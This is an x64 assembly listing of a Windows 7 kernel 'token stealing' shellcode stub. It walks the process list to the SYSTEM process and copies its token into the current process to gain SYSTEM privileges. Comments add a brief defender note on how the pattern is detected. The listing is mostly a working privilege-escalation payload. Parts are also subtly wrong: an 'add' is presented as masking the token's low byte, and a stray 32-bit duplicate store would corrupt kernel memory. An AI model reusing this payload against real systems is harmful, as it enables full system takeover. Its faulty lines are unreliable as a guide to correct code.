Windows 7 x64 Token Stealing Shellcode Stub for current process
.code | |
PUBLIC get_token | |
;-----------------------------------------------------------------------
; get_token  (MASM, x64 Intel syntax)
; Listing fragment: the symbols KTHREAD_OFFSET, EPROCESS_OFFSET,
; FLINK_OFFSET, Unique_PID, TOKEN and SYSTEM_PID are referenced below
; but not defined in this listing, so it does not assemble on its own;
; their values are version-specific (title says Windows 7 x64).
; In:    nothing (reads the current thread via the gs segment)
; Out:   rax, rcx, rdx, r8 are written; no value is returned to a caller
;        by any visible convention; flags clobbered.
; Defender note: read of gs:[KTHREAD_OFFSET] -> EPROCESS, walk of the
; ActiveProcessLinks list until UniqueProcessId == SYSTEM_PID, then a
; write of that process's Token field into the current EPROCESS is the
; widely documented kernel token-replacement pattern; kernel memory
; integrity checks and EDR kernel telemetry are the usual places this
; sequence is looked for.
;-----------------------------------------------------------------------
get_token proc | |
;required register cleaning | |
; Get pointer to _EPROCESS Structure | |
xor rax, rax ; Set Zero | |
mov rax, gs:[rax + KTHREAD_OFFSET] ; nt!_KPRC -> PrcbData -> CurrentThread | |
mov rax, [rax + EPROCESS_OFFSET] ; nt!_KTHREAD -> APCState -> Process | |
mov rcx, rax ; Copy current _EPROCESS structure (rcx = current process, live until the final store) | |
mov r8, rcx ; Store reference point for token | |
add r8, 7 ; byte align | |
; Assign System PID | |
mov rdx, SYSTEM_PID ; 0x004 | |
; GetSystemPID Loop Logic | |
; pprocess = current_process | |
; while pprocess->UniqueProcessId ! = SystemProcess->UniqueProcessId { | |
; pprocess = pprocess->Flink | |
; } | |
; NOTE: the loop has no iteration bound; it relies on the list being
; circular and containing a process whose UniqueProcessId == rdx.
GetSystemPID: | |
mov rax, [rax + FLINK_OFFSET] ; nt!_EPROCESS -> ActiveProcessLinks[0] -> Flink | |
sub rax, FLINK_OFFSET ; Next Process (LIST_ENTRY address back to _EPROCESS base) | |
cmp[rax + Unique_PID], rdx ; Compare the Unique Process ID with 4 | |
jne GetSystemPID | |
mov rdx, [rax + TOKEN] ; Copy SYSTEM process nt!_EPROCESS -> Token | |
add rdx, 0f0h ; Nullify last byte of the token | |
or rdx, r8 ; Token Reference Count | |
mov[rcx + TOKEN], rdx ; Copy token of system to current process | |
mov[ecx + TOKEN], edx ; Copy token of system to current process | |
; stack_alignment | |
get_token ENDP | |
END |